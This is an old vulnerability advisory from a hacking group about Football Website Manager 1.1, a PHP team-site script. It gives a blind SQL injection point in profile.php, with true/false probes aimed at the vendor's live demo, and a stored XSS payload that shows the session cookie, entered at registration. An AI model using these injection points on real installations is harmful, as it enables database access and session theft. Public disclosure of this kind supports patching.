Football Website Manager PHP Script BSQL-i / Persistent XSS Vulnerability

2011-04-26 / 2011-04-27
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

========================================================================= Football Website Manager PHP Script BSQL-i / Persistent XSS Vulnerability ========================================================================== +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= +=+=+= +=+=+= +=+=+= /\ | | | | ________ _____ _____ __ _ __ +=+=+= +=+=+= / \ | |__| | _____ / ______/ | _ \ | ____|\ \ / \ / / +=+=+= +=+=+= / /\ \| |__| | /_____/ | | | |_) / | |__ \ \/ \/ / +=+=+= +=+=+= / ____ \ | | | | |_______ | __\ \ | __| \ / +=+=+= +=+=+= /_/ \_\| | | |________/ |_| \_\ | |_______\_____/_____ +=+=+= +=+=+= |_____________________|+=+=+= +=+=+= +=+=+= +=+=+= X-n3t - **RoAd_KiLlEr** - The|Denny` - The_1nv1s1bl3 +=+=+= +=+=+= +=+=+= +=+=+= 0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+= +=+=+= +=+=+= +=+=+= ....::: | ALBANIAN HACKING CREW | :::.... 2011 +=+=+= +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 0 0 1 ########################################### 1 0 I'm **RoAd_KiLlEr** member from 1337 DAY Team 1 1 ########################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+]Title :.......Football Website Manager PHP Script BSQL-i / Persistent XSS Vulnerability [+]Author :......**RoAd_KiLlEr** [+]Tested on :...Win Xp Sp 2/3 | Apache 2.0.64 | PHP: 5.3.5 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Contact: sukihack[at]gmail[dot]com [~] Home: http://1337day.com/author/2447 [~] Vendor: http://www.nil.clan-hosts.net/cycsoftware/index.php [~] Download CMS:http://www.nil.clan-hosts.net/cycsoftware/modules.php?op=modload&name=Downloads&file=index&req=getit&lid=2 [~] Version: 1.1 [~] License: GNU GPL ==========ExPl0iT3d by **RoAd_KiLlEr**========== [+] Description: Football Website Manager is a PHP script that allows you to create a website for a football (soccer) team in order to keep track of team info and league matches. It is menu driven so no HTML or programing knowledge is required. It allows you to add teams in your division, add players to your squad, assign roles to each member (player, manager etc) add fixtures, then add results for your matches as well as other teams to keep the league table up to date. You can also post news stories to the main page, assign rights to other players to post news or give them full access. ======================================== [ I ]. BSQL-i Vulnerability +=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [P0C]: http://127.0.0.1/profile.php?fileId=[BLIND SQL INJECTION] [L!v3 D3m0]: http://www.nil.clan-hosts.net/fbdemo/profile.php?fileId=-113 <== FALSE :P http://www.nil.clan-hosts.net/fbdemo/profile.php?fileId=113 <== TRUE :D [ II ]. Persistent XSS Vulnerability +=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Persitent XSS egzists in the members area. First go to any site,than click register http://127.0.0.1/register.php In the area of your Username and Full Name write the javascript :D.. [At4ck Patt3rn]: "><script>alert(document.cookie)</script> Than when you go to view your profile the script executes. [+] TIME TABLE: 26 April 2011 - Vulnerability discovered. 26 April 2011 - Vendor Notified. 27 April 2011 - Advisory released. ============================ [!] Albanian Hacking Crew ============================ [!] **RoAd_KiLlEr** ============================ [!] MaiL: sukihack[at]gmail[dot]com ============================ [!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers ============================ [!] Spec Th4nks: r0073r | indoushka | Sid3^effects | DoNnY | All 1337day Members | And All My Friendz ============================ [!] Red n'black i dress eagle on my chest It's good to be an ALBANIAN Keep my head up high for that flag I die Im proud to be an ALBANIAN ============================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top